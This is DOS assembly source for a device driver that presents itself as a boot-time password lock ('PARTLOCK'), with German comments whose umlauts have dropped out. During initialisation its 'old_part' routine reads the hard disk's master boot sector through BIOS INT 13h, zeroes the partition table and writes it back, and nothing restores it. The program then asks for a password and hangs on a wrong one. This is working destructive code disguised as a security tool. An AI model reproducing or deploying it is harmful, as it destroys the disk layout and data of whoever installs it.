; PARTLOCK fragt das Pawort ab

retf   macro
       db 0CBh
       endm

code            segment para
assume          cs:code,ds:code,es:code,ss:code

dskdev: dw      -1,-1           ;DOS: Adresse nchster Treiber
        dw      8000h           ;Blockeinheit
        dw      strategy        ;Zeiger auf Strategy-Entry
        dw      dskint          ;Zeiger auf Device-Interrupt
        db      'FESTLOCK'      ;Name hat keine Funktion
ptrsav  dd      0               ;Zeiger auf die Anforderungszeile
pointer dw      offset passwd   ;Fr Password-nderungs-Utility

strategy:
        mov     word ptr cs:[ptrsav],bx   ; Adresse der Zeile
        mov     word ptr cs:[ptrsav+2],es ; sichern
        retf

;----- Hauptprogramm des Treibers -----

dskint: push    ds   ;Alle Register sichern
        push    es
        push    ax
        push    bx
        push    cx
        push    dx
        push    si
        push    di
        les     bx,cs:[ptrsav]  ;Anforderungszeile
        mov     al,es:[bx+2]    ;Befehl holen
        cmp     al,0            ;Nur INIT wird untersttzt
        jnz     cmderr          ;Sonst gibt es einen Fehler
        jmp     init

cmderr: mov     al,3            ;Unbekannter Befehl
        mov     ah,10000001b    ;Fertig, aber Fehler
        stc
        jmp     short exit1

exit:   mov     ah,00000001b    ;Fertig ohne Fehler
exit1:  les     bx,cs:[ptrsav]
        mov     es:[bx+3],ax    ;Zurckmelden
        pop     di              ;Register wieder vom Stack
        pop     si
        pop     dx
        pop     cx
        pop     bx
        pop     ax
        pop     es
        pop     ds
        retf                    ;Zurck zum DOS

init:   mov     ax,offset init  ;Adresse nichttransienter Teil
here_end:
        cli                     ;Keine Interrupts
        mov     word ptr es:[bx+0eh],ax
        mov     word ptr es:[bx+10h],cs
        push    cs
        pop     ds              ;DS=CS
        call    old_part        ;Partitionstabelle lschen
        mov     si,offset message
        call    text_aus        ;Startmeldung ausgeben
        call    convert_pass    ;gespeichertes Password dekodieren
        mov     cx,0
        mov     si,offset in_buff
        call    input_pass      ;Password-Eingabe
        call    compare_pass    ;Pawrter vergleichen
        jz      exit            ;Bei bereinstimmung weiter
        mov     si,offset falsch
        call    text_aus        ;Fehlertext ausgeben
endl:   jmp     short endl      ;Endlosschleife

;----- Unterprogramme -----

; Partitionstabelle auf der Platte lschen
old_part:
        push    es
        push    ds
        pop     es
        mov     bx,offset buffer
        mov     cx,1            ;Spur 0, Sektor 1
        mov     dx,80h          ;Kopf 0, Harddisk 0
        mov     ax,0201h        ;Sektor lesen
        int     13h             ;BIOS-Interrupt
        mov     cx,40h
        mov     di,offset buffer+1BEh ;Partitionstabelle
        mov     al,0            ;Mit Nullen vollschreiben
        rep     stosb
        mov     cx,1            ;Spur 0, Sektor 1
        mov     dx,80h          ;Kopf 0, Harddisk 0
        mov     ax,0301h        ;Sektor schreiben
        int     13h             ;BIOS-Interrupt
        pop     es
        ret

;Textausgabe ber BIOS-Interrupt

text_aus:
        mov     bh,0
loop2:  lodsb
        cmp     al,0            ;Endezeichen fr Textausgabe
        jz      aus_end
        mov     ah,0eh          ;TTY-Funktion
        int     10h             ;Video-Interrupt
        jmp     short loop2
aus_end:ret

;Gespeichertes Pawort dekodieren

convert_pass:
        mov     [laenge],0
        mov     si,offset passwd
        mov     al,23h          ;Kodierungsfunktion
loopd:  xor     [si],al         ;XOR, das erste Byte mit 23h
        cmp     byte ptr [si],20h
        jz      aus_end         ;Folgende mit vorhergehenden
        mov     al,[si]         ;bis zum Space
        inc     si
        inc     [laenge]
        jmp     short loopd

;Pawort einlesen

input_pass:
        mov     ah,0            ;Tastatur lesen
        int     16h             ;BIOS-Interrupt
        cmp     al,0dh          ;Enter?
        jz      aus_end
        cmp     al,08h          ;Backspace?
        jz      back
        inc     cx              ;Zeichen annehmen
        mov     [si],al
        inc     si
        cmp     cx,20           ;maximal 20 Zeichen
        jnz     input_pass
        ret
back:   cmp     si,offset in_buff
        jz      input_pass
        dec     si
        dec     cx
        mov     byte ptr [si],20h
        jmp     short input_pass

;Gespeichertes und eingelesenes Pawort vergleichen

compare_pass:
        cmp     cx,[laenge]       ;Gleiche Lnge?
        jnz     aus_end
        mov     si,offset passwd
        mov     di,offset in_buff
c_loop: mov     al,[si]
        cmp     [di],al
        jnz     aus_end
        inc     si
        inc     di
        loop    c_loop
        or      cx,cx              ;bei CX=0 Vergleich OK
        ret

; ----- Datenbereich -----

passwd  db      73h,11h,12h,00h,04h,18h,1dh,16h,64h
        db      11 dup (20h)    ;PASSWORD (Groschreibung)

message db      0dh,0ah,0ah,0ah,'Password: ',0
falsch  db      0dh,0ah,'Password nicht korrekt',0
in_buff db      20 dup (20h)
laenge  dw      0
buffer  db      512 dup (?)
code    ends
        end
